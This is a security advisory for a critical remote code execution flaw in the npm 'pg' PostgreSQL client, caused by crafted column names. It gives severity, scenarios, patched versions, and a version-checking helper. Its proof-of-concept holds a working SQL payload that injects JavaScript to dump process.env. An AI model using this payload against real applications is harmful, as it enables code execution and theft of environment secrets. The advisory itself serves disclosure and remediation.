GHSA-wc9v-mj63-m9g5

Source
https://github.com/advisories/GHSA-wc9v-mj63-m9g5
Import Source
https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2018/07/GHSA-wc9v-mj63-m9g5/GHSA-wc9v-mj63-m9g5.json
JSON Data
https://api.osv.dev/v1/vulns/GHSA-wc9v-mj63-m9g5
Aliases
Published
2018-07-24T19:44:42Z
Modified
2023-11-08T03:59:03.759366Z
Severity
  • 9.8 (Critical) CVSS_V3 - CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
Summary
Remote Code Execution in pg
Details

Affected versions of pg contain a remote code execution vulnerability that occurs when the remote database or query specifies a crafted column name.

There are two specific scenarios in which it is likely for an application to be vulnerable:
  1. The application executes unsafe, user-supplied SQL which contains malicious column names.
  2. The application connects to an untrusted database and executes a query returning results which contain a malicious column name.

Proof of Concept

const { Client } = require('pg')
const client = new Client()
client.connect()

const sql = `SELECT 1 AS "\\'/*", 2 AS "\\'*/\n + console.log(process.env)] = null;\n//"`

client.query(sql, (err, res) => {
  client.end()
})

Recommendation

  • Version 2.x.x: Update to version 2.11.2 or later.
  • Version 3.x.x: Update to version 3.6.4 or later.
  • Version 4.x.x: Update to version 4.5.7 or later.
  • Version 5.x.x: Update to version 5.2.1 or later.
  • Version 6.x.x: Update to version 6.4.2 or later. (Note that versions 6.1.6, 6.2.5, and 6.3.3 are also patched.)
  • Version 7.x.x: Update to version 7.1.2 or later. (Note that version 7.0.2 is also patched.)
Database specific
{
    "github_reviewed_at": "2020-06-16T22:00:03Z",
    "cwe_ids": [
        "CWE-94"
    ],
    "nvd_published_at": null,
    "severity": "CRITICAL",
    "github_reviewed": true
}
References

Affected packages

npm / pg (range type: SEMVER)

Affected ranges (introduced version, fixed version):
  • Introduced 0 (unknown introduced version; all previous versions are affected), fixed 2.11.2
  • Introduced 3.0.0, fixed 3.6.4
  • Introduced 4.0.0, fixed 4.5.7
  • Introduced 5.0.0, fixed 5.2.1
  • Introduced 6.0.0, fixed 6.0.5
  • Introduced 6.1.0, fixed 6.1.6
  • Introduced 6.2.0, fixed 6.2.5
  • Introduced 6.3.0, fixed 6.3.3
  • Introduced 6.4.0, fixed 6.4.2
  • Introduced 7.0.0, fixed 7.0.2
  • Introduced 7.1.0, fixed 7.1.2
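The affected ranges above follow OSV event semantics: a version is affected when some range has introduced <= version < fixed. The following is an added example (not code from the advisory or from the pg project) that evaluates an installed pg version against exactly the ranges listed on this page and reports the first fixed release to move to; the function names `checkPgVersion`, `compareVersions` and `parseVersion` are assumptions, and prerelease/build suffixes are dropped before comparison.

```javascript
// Added example, not from the advisory or the pg project. The ranges are
// copied from the "Affected ranges" list of GHSA-wc9v-mj63-m9g5 above.
const AFFECTED_RANGES = [
  { introduced: '0',     fixed: '2.11.2' }, // "0" = every earlier version
  { introduced: '3.0.0', fixed: '3.6.4' },
  { introduced: '4.0.0', fixed: '4.5.7' },
  { introduced: '5.0.0', fixed: '5.2.1' },
  { introduced: '6.0.0', fixed: '6.0.5' },
  { introduced: '6.1.0', fixed: '6.1.6' },
  { introduced: '6.2.0', fixed: '6.2.5' },
  { introduced: '6.3.0', fixed: '6.3.3' },
  { introduced: '6.4.0', fixed: '6.4.2' },
  { introduced: '7.0.0', fixed: '7.0.2' },
  { introduced: '7.1.0', fixed: '7.1.2' },
];

// Parse "major.minor.patch" into three integers; a bare "0" becomes [0, 0, 0].
// Any "-prerelease" or "+build" suffix is dropped, so "6.4.2-rc.1" is treated
// as 6.4.2 (assumption of this example, stricter tools may differ).
function parseVersion(v) {
  const core = String(v).split(/[-+]/)[0];
  const parts = core.split('.').map((p) => Number.parseInt(p, 10));
  if (parts.length < 1 || parts.length > 3 || parts.some(Number.isNaN)) {
    throw new Error(`unparseable version: ${v}`);
  }
  while (parts.length < 3) parts.push(0);
  return parts;
}

// Numeric comparison component by component: -1, 0 or 1.
function compareVersions(a, b) {
  const pa = parseVersion(a);
  const pb = parseVersion(b);
  for (let i = 0; i < 3; i++) {
    if (pa[i] !== pb[i]) return pa[i] < pb[i] ? -1 : 1;
  }
  return 0;
}

// OSV event semantics: affected iff introduced <= version < fixed for some range.
// Returns { affected, fixedIn } where fixedIn is the release to upgrade to.
function checkPgVersion(version) {
  for (const r of AFFECTED_RANGES) {
    if (compareVersions(version, r.introduced) >= 0 &&
        compareVersions(version, r.fixed) < 0) {
      return { affected: true, fixedIn: r.fixed };
    }
  }
  return { affected: false, fixedIn: null };
}
```

Feed it the `version` field of `node_modules/pg/package.json` (or the pg entry of a lockfile) to decide whether a deployment needs the upgrade listed under Recommendation.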